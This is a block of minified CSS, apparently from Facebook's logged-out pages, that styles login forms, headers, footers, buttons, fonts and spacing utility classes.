._4-do{text-align:center}._4-dp{font-size:24px;line-height:28px;margin:40px 0 20px}._4-dq{font-size:16px;line-height:28px;margin:20px 0}._4-dr{font-size:12px;line-height:20px}
._51u6{margin-bottom:-4px}._41uf,._41ug{display:inline-block;padding-right:14px;position:relative}._41uf .img{margin-left:1px;position:absolute;vertical-align:middle}._41ug .img{position:absolute;top:1px;vertical-align:middle}

._605a ._4ooo:not(._1ve7),._5eit ._4ooo:not(._1ve7){border-radius:50%;overflow:hidden}._605a ._7mi5:not(._1ve7){border-radius:8px;height:40px;overflow:hidden;width:40px}._6y97{border:2px solid #bec3c9;border-radius:50%;box-sizing:border-box;padding:2px 2px}._6_ut._6y97{border-color:#3578e5}
.fbx #pageFooter{margin:auto;width:auto}.hasLeftCol #pageFooter{background-color:#fff;clear:both;margin-left:180px}#pagefooter{border-top:0}#pageFooter{color:#737373;margin:0 auto;width:980px}#pageFooter a{text-decoration:none;white-space:nowrap}#pageFooter a:last-child{margin-right:0}#pageFooter a:hover{text-decoration:underline}#pageFooter .copyright{font-size:11px}#pageFooter .pageFooterLinkList{line-height:1.6;margin-left:-20px}#contentCurve{border-bottom:1px solid #dddfe2;font-size:1px;height:8px;margin-bottom:8px}.hasLeftCol #contentCurve{border:1px solid #ccc;border-top:none;position:relative}
#navLogin ._yl4{z-index:4}._yl4{position:relative;top:22px}._yl8{background-color:#f5f6f7;border:0 solid white;border-radius:3px;box-shadow:0 3px 8px rgba(0, 0, 0, .3);height:266px;padding-bottom:6px;text-align:center}._yl9{color:#7f7f7f;font-size:12px;line-height:14px;margin-bottom:10px;margin-top:16px}._yl8 ._yla{font-size:12px;height:28px;line-height:28px;min-width:68px}._yl4 ._yl7 .beeperNub{left:230px}._yl7._ylb{border:0 solid white;border-radius:3px;height:266px;right:-16px;top:35px;width:260px;z-index:1000}
._erp{background:white;border-radius:3px;padding:10px 16px 16px 16px}._err,._ers{font-size:12px;line-height:14px;text-align:left}._err input,._ers input{border:1px solid #d3d6db;font-size:14px;height:28px;margin:1px;padding:1px 3px;text-align:left;width:220px}._er_{color:#365899;font-size:12px;margin-bottom:10px;text-align:right}._erp ._es1{font-size:12px;height:28px;line-height:14px;margin-bottom:4px;padding:0 0;width:226px}._3jii{margin-top:1px;visibility:hidden}
._1pmx{background-color:#3b5998;border-bottom:1px solid #29487d;box-sizing:border-box;height:88px;width:100%}.tinyViewport ._1pmx{min-width:-moz-max-content;min-width:max-content}._1pmx ._3jd8:not(:active){background-clip:padding-box;background-color:#5a73ad;border-color:rgba(0, 0, 0, .15)}._1pmx ._3jd8:hover:not(:active){background-color:#5069a3}
._sv8{line-height:24px}
.localeSelectorList{align-items:center;display:flex;flex-wrap:wrap}.localeSelectorList a.showMore{background-color:#e9ebee;padding:0 6px 2px}.localeSelectorList a.showMore:hover{background-color:#6d84b4;color:#fff;text-decoration:none}
.__tw{background:#fff;border:1px solid rgba(100, 100, 100, .4);border-radius:0 0 2px 2px;box-shadow:0 3px 8px rgba(0, 0, 0, .25);color:#1d2129;overflow:visible;position:absolute;top:38px;width:460px;z-index:-1}._1nxz .__tw,._dyn .__tw,._l35 .__tw{top:45px;z-index:1}.__tw .metadata{padding-top:3px}.__tw .jewelItemList{padding:4px 0}.__tw .empty,.__tw .jewelHighlight .empty{border:none;color:#90949c;padding:4px 8px 10px}.__tw .jewelHighlight li a{color:#1d2129;display:block;padding:4px 8px;text-decoration:none}.__tw .jewelHighlight li a:hover,.__tw .jewelHighlight li a:active,.__tw .jewelHighlight li a:focus{background-color:#f5f6f7;border-bottom:1px solid #dddfe2;border-top:1px solid #dddfe2;outline:none;padding-bottom:3px;padding-top:3px;text-decoration:none}.__tw .jewelHighlight a:hover span,.__tw .jewelHighlight a:active span,.__tw .jewelHighlight a:focus span,.__tw .jewelHighlight a:hover div,.__tw .jewelHighlight a:active div,.__tw .jewelHighlight a:focus div,.__tw .jewelHighlight li.selected a,.__tw .jewelHighlight li.selected .timestamp{color:#fff}.__tw .jewelHighlight li{border-top:1px solid #e6e6e6;cursor:pointer}.__tw .jewelHighlight li:first-child{border-top:none}.__tw li.jewelItemNew{background-color:#edf2fa}.__tw li>a,.__tw li>.anchorContainer>a{outline:none}.__tw .uiScrollableAreaWithShadow.contentAfter:after{content:none}.__tw li.jewelItemResponded{background:#fff9d7;color:#1d2129}.__tw .jewelLoading{display:block;margin:10px auto}.__tw .uiScrollableAreaContent>.jewelLoading:only-child{margin-bottom:9px}.__tw .jewelFooter .seeMoreCount{display:none;font-weight:600;padding:2px 0 0}.__tw .x_div{position:absolute;right:10px;top:58%;transition:margin-right 250ms;z-index:2}.__tw .jewelItemList{padding:0}.__tw .uiScrollableAreaContent{padding-bottom:1px}.__tw .beeperNub{background-image:url(/rsrc.php/v3/yK/r/kNYkizqJr9j.png);background-repeat:no-repeat;background-size:auto;background-position:-192px -251px;height:11px;position:absolute;top:-11px;width:20px}.__tw div.jewelHeader{background-clip:padding-box;background-color:#fff;border-bottom:solid 1px #dddfe2;border-top-left-radius:3px;border-top-right-radius:3px;padding:8px 12px 6px;position:relative;z-index:100}.__tw .jewelHeader h3>a,.__tw .jewelHeader h4>a{color:inherit;text-decoration:none}.__tw .jewelFooter a{background-color:#fff;border-bottom-left-radius:3px;border-bottom-right-radius:3px;border-top:1px solid #dddfe2;display:block;font-weight:600;padding:8px 12px;position:relative;text-align:center;z-index:100}.__tw .jewelFooter a:hover,.__tw .jewelFooter a:active,.__tw .jewelFooter a:focus{color:#365899;outline:none;text-decoration:underline}.__tw .jewelFooter a:hover .seeMoreCount,.__tw .jewelFooter a:active .seeMoreCount,.__tw .jewelFooter a:focus .seeMoreCount{color:gray}.__tw .jewelItemList{padding:0}
._cqp{font-size:18px;line-height:22px;padding:18px 0;text-align:center}._cqq{background-color:#fff;padding:22px 108px 26px;text-align:center}._cqq ._cqr{font-size:14px;height:36px;line-height:34px;margin:10px;margin-top:18px;text-align:center;width:150px}._cqs{margin:0 auto;width:612px}.fbx ._cqt#globalContainer{width:100%}._cqu{margin:0 auto;text-align:left;width:981px}
._30ny{padding:80px 0}._97vt ._30ny{background:#f0f2f5}._30ny .infoRevealReason{font-size:13px;margin:auto;padding:16px 0 20px 0;text-align:left;width:500px}
html ._44mg{padding:6px 0;width:302px}html ._1kbt._1kbt{font-size:14px;padding:5px 8px;width:284px}#facebook ._97v- ._1kbt{border-radius:6px;font-size:17px;padding:14px 16px;width:330px}#facebook ._9ay4{border:1px solid #f02849}._9ay5{position:relative}._9ay6{bottom:16px;position:absolute;right:10px}#facebook ._9npi{background:none;border:0;box-shadow:none;float:left;font-size:17px;padding:0;width:300px}#facebook ._44mg ._9ay7{color:#f02849;font-family:SFProText-Regular, Helvetica, Arial, sans-serif;font-size:13px;line-height:16px;margin-top:8px;text-align:left}._9nyg{border:1px solid #dddfe2;color:#1d2129;height:22px;line-height:16px;vertical-align:middle;width:330px}._9nyh{border-color:#dddfe2;box-shadow:none;caret-color:none}#facebook ._9nyi{border-color:#1b74e4;box-shadow:0 0 0 2px #e7f3ff;caret-color:#1b74e4}._44mg ._9ay7 a{color:#f02849;font-weight:bold}._9ls7{position:relative}._9ls8{background:url(/rsrc.php/v3/yZ/r/je5FEJkU1_K.png)}._9ls9{background:url(/rsrc.php/v3/yk/r/swFqSxKYa5M.png)}._9lsa{border-radius:50%;bottom:-25px;height:28px;position:absolute;right:-8px;width:28px}._9lsa:hover{background-color:rgba(0, 0, 0, .05)}._9lsa:active{background-color:rgba(0, 0, 0, .15)}._9lsb{bottom:6px;height:16px;position:absolute;right:6px;width:16px}
._lwx{position:relative}
.signupBanner .signup_bar_container{background-color:transparent}.signupBanner .signup_box{margin:0 auto;position:relative;width:980px}.signupBanner .signup_btn{left:180px;padding-bottom:2px;padding-top:2px;position:absolute;top:-50px}.signupBanner .signup_btn_thickbar{left:180px;position:absolute;top:-70px}.signup_area{margin-top:23px}.timelineLayoutLoggedOut .signup_btn{left:250px}
._52ju{text-align:left}._52jv{text-align:center}._52jw{text-align:right}
._53ij{background:#fff;background:var(--card-background, #FFFFFF);position:relative}._53io{overflow:hidden;position:absolute}._53ih ._53io{display:none}

.uiBoxGray{background-color:#f2f2f2;border:1px solid #ccc}.uiBoxDarkgray{color:#ccc;background-color:#333;border:1px solid #666}.uiBoxGreen{background-color:#d1e6b9;border:1px solid #629824}.uiBoxLightblue{background-color:#edeff4;border:1px solid #d8dfea}.uiBoxRed{background-color:#ffebe8;border:1px solid #dd3c10}.uiBoxWhite{background-color:#fff;border:1px solid #ccc}.uiBoxYellow{background-color:#fff9d7;border:1px solid #e2c822}.uiBoxOverlay{background:rgba(255, 255, 255, .85);border:1px solid #3b5998;border:1px solid rgba(59, 89, 153, .65);zoom:1}.noborder{border:none}.topborder{border-bottom:none;border-left:none;border-right:none}.bottomborder{border-left:none;border-right:none;border-top:none}.dashedborder{border-style:dashed}
.pas{padding:5px}.pa8{padding:8px}.pam{padding:10px}.pa16{padding:16px}.pal{padding:20px}.pts{padding-top:5px}.pt8{padding-top:8px}.ptm{padding-top:10px}.pt16{padding-top:16px}.ptl{padding-top:20px}.prs{padding-right:5px}.pr8{padding-right:8px}.prm{padding-right:10px}.pr16{padding-right:16px}.prl{padding-right:20px}.pbs{padding-bottom:5px}.pb8{padding-bottom:8px}.pbm{padding-bottom:10px}.pb16{padding-bottom:16px}.pbl{padding-bottom:20px}.pls{padding-left:5px}.pl8{padding-left:8px}.plm{padding-left:10px}.pl16{padding-left:16px}.pll{padding-left:20px}.phs{padding-left:5px;padding-right:5px}.ph8{padding-left:8px;padding-right:8px}.phm{padding-left:10px;padding-right:10px}.ph16{padding-left:16px;padding-right:16px}.phl{padding-left:20px;padding-right:20px}.pvs{padding-top:5px;padding-bottom:5px}.pv8{padding-bottom:8px;padding-top:8px}.pvm{padding-top:10px;padding-bottom:10px}.pv16{padding-bottom:16px;padding-top:16px}.pvl{padding-top:20px;padding-bottom:20px}.mas{margin:5px}.ma8{margin:8px}.mam{margin:10px}.ma16{margin:16px}.mal{margin:20px}.mts{margin-top:5px}.mt8{margin-top:8px}.mtm{margin-top:10px}.mt16{margin-top:16px}.mtl{margin-top:20px}.mrs{margin-right:5px}.mr8{margin-right:8px}.mrm{margin-right:10px}.mr16{margin-right:16px}.mrl{margin-right:20px}.mbs{margin-bottom:5px}.mb8{margin-bottom:8px}.mbm{margin-bottom:10px}.mb16{margin-bottom:16px}.mbl{margin-bottom:20px}.mls{margin-left:5px}.ml8{margin-left:8px}.mlm{margin-left:10px}.ml16{margin-left:16px}.mll{margin-left:20px}.mhs{margin-left:5px;margin-right:5px}.mh8{margin-left:8px;margin-right:8px}.mhm{margin-left:10px;margin-right:10px}.mh16{margin-left:16px;margin-right:16px}.mhl{margin-left:20px;margin-right:20px}.mvs{margin-top:5px;margin-bottom:5px}.mv8{margin-bottom:8px;margin-top:8px}.mvm{margin-top:10px;margin-bottom:10px}.mv16{margin-bottom:16px;margin-top:16px}.mvl{margin-top:20px;margin-bottom:20px}
.fss{font-size:9px}.fsm{font-size:12px}.fsl{font-size:14px}.fsxl{font-size:16px}.fsxxl{font-size:18px}.fwn{font-weight:normal}.fwb{font-weight:600}.fcb{color:#333}.fcg{color:#90949c}.fcw{color:#fff}
.uiHeader h1{color:#162643;font-size:20px}.uiHeader h2{color:#162643;font-size:16px}.uiHeader h2 a{color:#162643}.uiHeader h3,.uiHeader h4{color:#333;font-size:12px}.uiHeader h5,.uiHeader h6{color:#666}.uiHeader .uiHeaderTitle{outline:none}.uiHeaderWithImage .uiHeaderTop{position:relative}.uiHeaderWithImage .uiHeaderTitle{padding-left:22px}.uiHeaderImage{left:0;position:absolute}.uiHeader h2 .uiHeaderImage{top:2px}.uiHeaderTopBorder{border-top:1px solid #aaa;padding-top:.5em}div.uiHeaderTopBorder{margin-left:0}.uiHeaderTopAndBottomBorder{border-bottom:1px solid #e9e9e9;border-top:1px solid #aaa;padding:5px 0}.uiHeaderMiddleBorder{border-bottom:1px solid #ccc;height:.8em;margin:.5em 0 1.5em 0;position:relative}.uiHeaderMiddleBorder .uiHeaderTitle,.uiHeaderMiddleBorder .uiHeaderActions{background-color:#fff;position:absolute;top:0}.uiHeaderMiddleBorder .uiHeaderTitle{left:0;padding-right:.5em}.uiHeaderMiddleBorder .uiHeaderActions{padding-left:.5em;right:0}.uiHeaderMiddleBorder .uiButton{margin-top:-2px}.uiHeaderBottomBorder{border-bottom:1px solid #aaa;padding-bottom:.5em}.uiHeaderPage{padding:6px 0 16px}.uiHeaderPage .uiHeaderTitle{line-height:20px;min-height:20px;padding-bottom:2px;vertical-align:bottom}.uiHeaderPage .uiHeaderActions{margin-top:-1px}.uiHeaderPage .uiHeaderTop .fsl{margin-top:3px}.uiHeaderNav{border-color:#ebedf0;margin:8px 0 0 6px;padding:7px 6px 3px 5px}.uiHeaderNavEmpty{padding-top:6px}.uiHeaderNav h4{color:#7f7f7f}.uiHeaderSection,.uiSideHeader{background-color:#f5f6f7;border-bottom:none;border-top:solid 1px #e9ebee;padding:4px 6px 5px}
.uiInterstitial{border-radius:4px;margin-left:auto;margin-right:auto}.uiInterstitialSmall{width:445px}.uiInterstitialLarge{width:555px}.uiInterstitialXLarge{width:620px}.uiInterstitial .interstitialHeader{border-color:#ccc;padding-bottom:.5em}.fullBleed .interstitialHeader{margin:0;padding:4px 12px 10px}.uiInterstitialContent{margin-bottom:15px}.fullBleed .uiInterstitialContent{margin:0;padding:0}.uiInterstitialBar{border-bottom-right-radius:3px;border-bottom-left-radius:3px;-moz-border-radius:0 0 3px 3px;line-height:16px;padding:8px 10px}div.uiInterstitialWithStripes{background:transparent url(/rsrc.php/v3/y9/r/y7MG8IZpiC8.gif) repeat-x;padding-top:15px}
._rv{height:100px;width:100px}._rw{height:50px;width:50px}._s0:only-child{display:block}._3tm9{height:14px;width:14px}._54rv{height:16px;width:16px}._3qxe{height:19px;width:19px}._1m6h{height:24px;width:24px}._3d80{height:28px;width:28px}._54ru{height:32px;width:32px}._tzw{height:40px;width:40px}._54rt{height:48px;width:48px}._54rs{height:56px;width:56px}._1m9m{height:64px;width:64px}._ry{height:24px;width:24px}
a._p{display:block}
._4-u2{border:1px solid #dddfe2;border-radius:3px}._4-u2>._4-u3{border-top:1px solid #e5e5e5}._4-u2>._2f27{border-top:none}._4-u2>._4-u3:first-child{border-top:none;border-top-left-radius:3px;border-top-right-radius:3px}._4-u2>._4-u3:last-child{border-bottom-left-radius:3px;border-bottom-right-radius:3px}._2yq ._4-u2{border-color:transparent;border-left-width:0;border-right-width:0;position:relative}._2yq ._4-u2::before{border:1px solid #dddfe2;border-radius:4px;bottom:-1px;content:'';left:-1px;pointer-events:none;position:absolute;right:-1px;top:-1px}
._4ki>li{border-width:0 0 0 1px;display:inline-block}._4kg>li{border-width:1px 0 0 0}._509->li{vertical-align:top}._509_>li{vertical-align:middle}._50a0>li{vertical-align:bottom}.uiList>li:first-child{border-width:0}._4ks>li{border-color:#ebedf0;border-style:solid}._4kt>li{border-color:#ccc;border-style:solid}._4ku>li{border-color:#aaa;border-style:solid}._4of{color:#365899;list-style-type:square;margin-left:12px}._7lda{list-style-type:disc;margin-left:16px}._7lda>._7ldb{text-indent:-2px}._4ki._703>li{padding-left:20px;padding-right:20px}._4ki._704>li{padding-left:5px;padding-right:5px}._4ki._6-j>li{padding-left:10px;padding-right:10px}._4ki._6-i>li{padding-right:0}._4kg._704>li{padding-top:5px;padding-bottom:5px}._4kg._6-j>li{padding-top:10px;padding-bottom:10px}._4kg._703>li{padding-top:20px;padding-bottom:20px}._4kg._6-i>li{padding-bottom:0}._4kg._6-h>li:first-child{padding-top:0}._4kg._6-h>li:last-child{padding-bottom:0}._4ki._6-h>li:first-child{padding-left:0}._4ki._6-h>li:last-child{padding-right:0}
._50f3{font-size:12px;line-height:16px}._50f4{font-size:14px;line-height:18px
}
._50f5{
	font-size:16px;
	line-height:20px
	}
._50f6{font-size:18px;line-height:22px}._2iei{font-size:40px;line-height:48px}._2iej{font-size:24px;line-height:28px}._2iek{font-size:20px;line-height:24px}._2iel{font-size:16px;line-height:20px}._2iem{font-size:14px;line-height:18px}._2ien{font-size:14px;line-height:18px}._2ieo{font-size:13px;line-height:17px}._2iep{font-size:12px;line-height:16px}._2ieq{font-size:12px;line-height:16px}._50f7{font-weight:600}._5kx5{font-weight:normal}._50f8{color:#90949c}._c24{color:#4b4f56}._50f9{color:#1d2129}._2iev{color:#1c1e21}._2iex{color:#606770}._2iey{color:#bec3c9}._rzx{color:#385898}._rzy{color:#8d949e}._2ier{color:#fff}._1hk0{color:#1877f2}._2iet{color:#00a400}._2ieu{color:#fa383e}._2iez{color:#ccc}._2ie-{color:#4a4a4a}._2ie_{color:#373737}#facebook ._5s6c._5s6c,._5s6c{font-family:Georgia, serif;letter-spacing:normal}#facebook ._6mv-._6mv-,._6mv-{font-family:'Open Dyslexic';letter-spacing:normal}.CometSettingsPage ._2iep,.CometSettingsPage ._2ieq,.CometSettingsPage ._50f4{font-size:15px;line-height:20px}.CometSettingsPage ._50f4{font-weight:500}
._8tm{padding:0}._2phz{padding:4px}._2ph-{padding:8px}._2ph_{padding:12px}._2pi0{padding:16px}._2pi1{padding:20px}._40c7{padding:24px}._2o1j{padding:36px}._6buq{padding-bottom:0;padding-top:0}._2pi2{padding-bottom:4px;padding-top:4px}._2pi3{padding-bottom:8px;padding-top:8px}._2pi4{padding-bottom:12px;padding-top:12px}._2pi5{padding-bottom:16px;padding-top:16px}._2pi6{padding-bottom:20px;padding-top:20px}._2o1k{padding-bottom:24px;padding-top:24px}._2o1l{padding-bottom:36px;padding-top:36px}._6bua{padding-left:0;padding-right:0}._2pi7{padding-left:4px;padding-right:4px}._2pi8{padding-left:8px;padding-right:8px}._2pi9{padding-left:12px;padding-right:12px}._2pia{padding-left:16px;padding-right:16px}._2pib{padding-left:20px;padding-right:20px}._2o1m{padding-left:24px;padding-right:24px}._2o1n{padding-left:36px;padding-right:36px}._iky{padding-top:0}._2pic{padding-top:4px}._2pid{padding-top:8px}._2pie{padding-top:12px}._2pif{padding-top:16px}._2pig{padding-top:20px}._2owm{padding-top:24px}._div{padding-right:0}._2pih{padding-right:4px}._2pii{padding-right:8px}._2pij{padding-right:12px}._2pik{padding-right:16px}._2pil{padding-right:20px}._31wk{padding-right:24px}._2phb{padding-right:32px}._au-{padding-bottom:0}._2pim{padding-bottom:4px}._2pin{padding-bottom:8px}._2pio{padding-bottom:12px}._2pip{padding-bottom:16px}._2piq{padding-bottom:20px}._2o1p{padding-bottom:24px}._4gao{padding-bottom:32px}._1cvx{padding-left:0}._2pir{padding-left:4px}._2pis{padding-left:8px}._2pit{padding-left:12px}._2piu{padding-left:16px}._2piv{padding-left:20px}._2o1q{padding-left:24px}._2o1r{padding-left:36px}/*FB_PKG_DELIM*/

#bootloader_YYuA3O7{height:42px;}.bootloader_YYuA3O7{display:block!important;
}
#facebook ._-kb.mac{font-family:Helvetica Neue, Helvetica, Arial, sans-serif}#facebook ._-kb.sf{font-family:system-ui, -apple-system, BlinkMacSystemFont, '.SFNSText-Regular', sans-serif}@font-face{font-family:'Segoe UI Historic';src:local('Arial');unicode-range:U+530-5f4, U+10a0-10ff}@font-face{font-family:'Segoe UI Historic';font-weight:700;src:local('Arial Bold'), local('Arial');unicode-range:U+530-5f4, U+10a0-10ff}#facebook ._-kb.segoe{font-family:Segoe UI Historic, Segoe UI, Helvetica, Arial, sans-serif}#facebook ._-kb.roboto{font-family:Roboto, Helvetica, Arial, sans-serif}#facebook ._-kb div{font-family:inherit}#facebook ._-kb span{font-family:inherit}#facebook ._-kb a{font-family:inherit}#facebook ._-kb h1,#facebook ._-kb h2,#facebook ._-kb h3,#facebook ._-kb h4,#facebook ._-kb h5,#facebook ._-kb h6,#facebook ._-kb p{font-family:inherit}#facebook ._-kb button,#facebook ._-kb input,#facebook ._-kb label,#facebook ._-kb select,#facebook ._-kb td,#facebook ._-kb textarea{font-family:inherit}#facebook ._-kb code,#facebook ._-kb pre{font-family:Menlo, Consolas, Monaco, monospace}#facebook ._-kb .fixemoji{font-weight:600}@font-face{font-family:'Fix for Mac Chrome 80';font-weight:500;src:local('Lucida Grande');unicode-range:U+530-5f4, U+10a0-10ff}#facebook ._-kb._93bn.sf{font-family:'Fix for Mac Chrome 80', system-ui, -apple-system, BlinkMacSystemFont, '.SFNSText-Regular', sans-serif}
#globalContainer{margin:0 auto;position:relative;zoom:1}.fbx #globalContainer{width:981px}.sidebarMode #globalContainer{padding-right:205px}.fbx #tab_canvas>div{padding-top:0}.fb_content{min-height:640px;padding-bottom:20px}.fbx .fb_content{padding-bottom:0}.skipto{display:none}.home .skipto{display:block}
.fixed_elem,.fixed_always{position:fixed!important}.tinyHeight .fixed_elem{position:static!important}.chrome .fixed_elem,.chrome .fixed_always{transform:translateZ(0)}.tinyHeight .chrome .fixed_elem{transform:none}
.fullScreen{height:100%;width:100%}
.menu_login_container table tr{vertical-align:top}.menu_login_container table tr td{padding:0 0 0 14px}.new_header_style.menu_login_container table tr td{padding:0 0 0 12px}.menu_login_container .html7magic{padding-bottom:4px}.menu_login_container .inputtext,.menu_login_container .inputpassword{border-color:#1d2a5b;margin:0;width:142px}.menu_login_container .login_form_label_field label,.menu_login_container .login_form_label_field a{color:#9cb4d8;font-weight:normal}.menu_login_container .login_form_label_field{padding-top:4px}.menu_login_container .html7magic label{color:#fff;font-weight:normal;padding-left:1px}#facebook .tetra_fonts .html7magic label{font-family:SFProText-Medium, Helvetica, Arial, sans-serif}#facebook .tetra_fonts .login_form_input_box{font-family:SFProText-Regular, Helvetica, Arial, sans-serif}#facebook .tetra_fonts .login_form_input_box::-moz-placeholder,#facebook .tetra_fonts .login_form_input_box:-moz-placeholder{color:#8d949e}#facebook .tetra_fonts .login_form_login_button input{font-family:SFProText-Bold, Helvetica, Arial, sans-serif;font-weight:bold}#facebook .tetra_fonts .login_form_label_field a{color:#fff;font-family:SFProText-Regular, Helvetica, Arial, sans-serif}.new_header_style .login_form_label_field{text-align:right}.new_header_style.menu_login_container table tr td.login_form_label_field{padding-top:4px}.new_header_style .login_form_label_field a{font-size:13px;line-height:20px}.new_header_style .inputtext,.new_header_style .inputpassword{border-color:#082b61;border-radius:6px;box-sizing:border-box;font-size:13px;line-height:20px;margin:0;padding:8px 12px;width:194px}.white_background.new_header_style .inputtext,.white_background.new_header_style .inputpassword{width:210px}.new_header_style.menu_login_container{width:412px}.white_background.new_header_style.menu_login_container{width:444px}.new_blue_header .inputtext,.new_blue_header .inputpassword{border:none}.new_header_style .login_form_login_button input{font-size:18px;line-height:20px;padding:6px 26px}.new_header_style .login_form_login_button{border-radius:6px}.new_blue_header .login_form_login_button{background-color:#0e52b0;border:none}.menu_login_container #email{direction:ltr}.login_form_standalone_labels .inputtext,.login_form_standalone_labels .inputpassword{border-color:#96a6c5;font-size:16px;padding:6px;width:250px}.login_form_standalone_labels label{color:#1d2a5b;font-size:13px;font-weight:normal}.login_form_standalone_labels .login_form_label_field a{color:#365899;font-size:13px}.login_form_standalone_labels td.html7magic{text-align:right}.login_form_standalone_labels .uiButton input{font-size:13px;padding:3px 25px 5px}table.login_form_standalone_labels tr td{height:30px;padding:0;vertical-align:middle}
.loggedout_menubar_container{height:82px;min-width:980px}.newHeaderMenuBar .loggedout_menubar_container{height:90px}.loggedout_menubar{margin:0 auto;padding-top:13px;width:980px}.newHeaderMenuBar .loggedout_menubar{padding-bottom:8px;padding-top:20px}.loggedout_menubar .fb_logo{margin-top:17px}.newHeaderMenuBar .loggedout_menubar .fb_logo{margin-top:4px}.loggedout_menubar .fb_icon_logo{margin-top:12px}@media (-webkit-min-device-pixel-ratio: 2),(min-resolution: 2dppx){.loggedout_menubar i.fb_logo{background-image:url(/rsrc.php/v3/y4/r/gf6iHxsw8zm.png);background-position:0 0;background-size:100% 100%}}.loggedout_menubar label.menu_login_show_link{color:#9cb4d8;position:relative;top:19px}
.signupBanner div.signup_bar_container{background-color:transparent}.signupBanner .signup_box{margin:0 auto;padding:0;position:relative;width:980px}.signupBanner .signup_btn{left:180px;position:absolute;top:-46px}.signupBanner .signup_btn_thickbar{left:180px;position:absolute;top:-70px}.signup_area{margin-top:23px}.timelineLayoutLoggedOut .signup_btn{left:250px}
._53jh{background-color:#3b5998;background-image:linear-gradient(#4e69a2, #3b5998 50%);border-bottom:1px solid #133783;min-height:42px;position:relative;z-index:1}._53jh._8f2f{background-color:#1877f2;background-image:none;border-bottom:none}.tinyViewport ._53jh{min-width:-moz-max-content;min-width:max-content}
.lfloat{float:left}.rfloat{float:right}
.uiButton{border-radius:2px;cursor:pointer;display:inline-block;font-size:12px;-moz-osx-font-smoothing:grayscale;font-weight:bold;line-height:18px;padding:2px 6px;text-align:center;text-decoration:none;text-shadow:none;vertical-align:top;white-space:nowrap}.gecko.mac .uiButton{font-family:Helvetica Neue, Helvetica, Arial, sans-serif}.uiButton,.uiButtonSuppressed:active,.uiButtonSuppressed:focus,.uiButtonSuppressed:hover{background-color:#f5f6f7;border:1px solid #ccd0d5}.uiButton+.uiButton{margin-left:4px}.uiButton:hover{background-color:#ebedf0;text-decoration:none}.uiButton:active,.uiButtonDepressed{background-color:#dddfe2;border-color:#bec3c9}.uiButton .img{margin-top:3px;overflow:hidden;vertical-align:top}.uiButtonLarge .img{margin-top:4px}.uiButton .customimg{margin-top:1px}.uiButtonText,.uiButton input{background:none;border:0;color:#4b4f56;cursor:pointer;display:inline-block;font-family:Helvetica, Arial, sans-serif;font-size:12px;font-weight:bold;line-height:18px;margin:0;padding:0;white-space:nowrap}.uiButton input::-moz-focus-inner{border:0;padding:0}.gecko .uiButton input:focus{outline:thin dotted}.uiButtonOverlay,.uiButtonOverlay:hover{background-clip:padding-box;background-color:rgba(255, 255, 255, .8);background-image:none;border-color:#a5a5a5;border-color:rgba(0, 0, 0, .35);border-radius:2px;position:relative}.uiButtonOverlay:focus,.uiButtonOverlay:active{background-color:#f5f6f7;background-color:rgba(249, 250, 252, .9);border-color:#365899;border-color:rgba(59, 89, 152, .5)}form.async_saving .uiButton.uiButtonOverlay,.uiButtonOverlay.uiButtonDisabled,.uiButtonOverlay.uiButtonDisabled:active,.uiButtonOverlay.uiButtonDisabled:focus,.uiButtonOverlay.uiButtonDisabled:hover{background-color:rgba(255, 255, 255, .8);border-color:#ccc;border-color:rgba(180, 180, 180, .8)}.uiButtonOverlay.uiButtonDepressed{background-color:rgba(0, 0, 0, .05)}.uiButtonOverlay:before{background-color:rgba(0, 0, 0, .02);bottom:0;content:'';left:0;position:absolute;right:0;top:0}.uiButtonOverlay:hover:before{background-color:rgba(0, 0, 0, .08)}.uiButtonSpecial{background-color:#42b72a;border-color:#42b72a}.uiButtonSpecial:hover{background-color:#36a420;border-color:#36a420}.uiButtonSpecial:active,.uiButtonSpecial.uiButtonDepressed{background-color:#2b9217;border-color:#2b9217}form.async_saving .uiButton.uiButtonSpecial,.uiButtonSpecial.uiButtonDisabled,.uiButtonSpecial.uiButtonDisabled:active,.uiButtonSpecial.uiButtonDisabled:focus,.uiButtonSpecial.uiButtonDisabled:hover{background-color:#ace0a2;border-color:#ace0a2}.uiButtonConfirm{background-color:#4267b2;border-color:#29487d}.uiButtonConfirm:hover{background-color:#365899;border-color:#29487d}.uiButtonConfirm:active,.uiButtonConfirm.uiButtonDepressed{background-color:#29487d;border-color:#29487d}form.async_saving .uiButton.uiButtonConfirm,.uiButtonConfirm.uiButtonDisabled,.uiButtonConfirm.uiButtonDisabled:active,.uiButtonConfirm.uiButtonDisabled:focus,.uiButtonConfirm.uiButtonDisabled:hover{background-color:#9cb4d8;border-color:#9cb4d8}form.async_saving .uiButton.uiButtonSpecial .uiButtonText,form.async_saving .uiButton.uiButtonSpecial input,form.async_saving .uiButton.uiButtonConfirm .uiButtonText,form.async_saving .uiButton.uiButtonConfirm input,.uiButtonSpecial .uiButtonText,.uiButtonSpecial input,.uiButtonSpecial.uiButtonDisabled .uiButtonText,.uiButtonSpecial.uiButtonDisabled input,.uiButtonConfirm .uiButtonText,.uiButtonConfirm input,.uiButtonConfirm.uiButtonDisabled .uiButtonText,.uiButtonConfirm.uiButtonDisabled input{color:#fff}form.async_saving .uiButton,.uiButtonDisabled,.uiButtonDisabled:active,.uiButtonDisabled:focus,.uiButtonDisabled:hover{background-color:#f5f6f7;border-color:#dddfe2}form.async_saving .uiButton .img,.uiButtonDisabled .img{opacity:.5}form.async_saving .uiButtonText,form.async_saving .uiButton input,.uiButtonDisabled .uiButtonText,.uiButtonDisabled input{color:#bec3c9}form.async_saving .uiButton,form.async_saving .uiButtonText,form.async_saving .uiButton input,.uiButtonDepressed,.uiButtonDepressed .uiButtonText,.uiButtonDepressed input,.uiButtonDisabled,.uiButtonDisabled .uiButtonText,.uiButtonDisabled input{cursor:default}.uiButtonDepressed:not(.uiButtonSpecial):not(.uiButtonConfirm) .uiButtonText,.uiButtonDepressed:not(.uiButtonSpecial):not(.uiButtonConfirm) input{color:#4080ff}.uiButtonLarge,.uiButtonLarge .uiButtonText,.uiButtonLarge input{font-size:13px;line-height:19px}.uiButtonSuppressed{background:none;border-color:transparent}.uiButtonNoText .img{margin-left:-1px;margin-right:-1px}.uiButtonNoText input{vertical-align:top}
._2qgu._2qgu{border-radius:50%;overflow:hidden}._2s25._2s25._606w._606w:after,._606w:after{border-radius:50%}
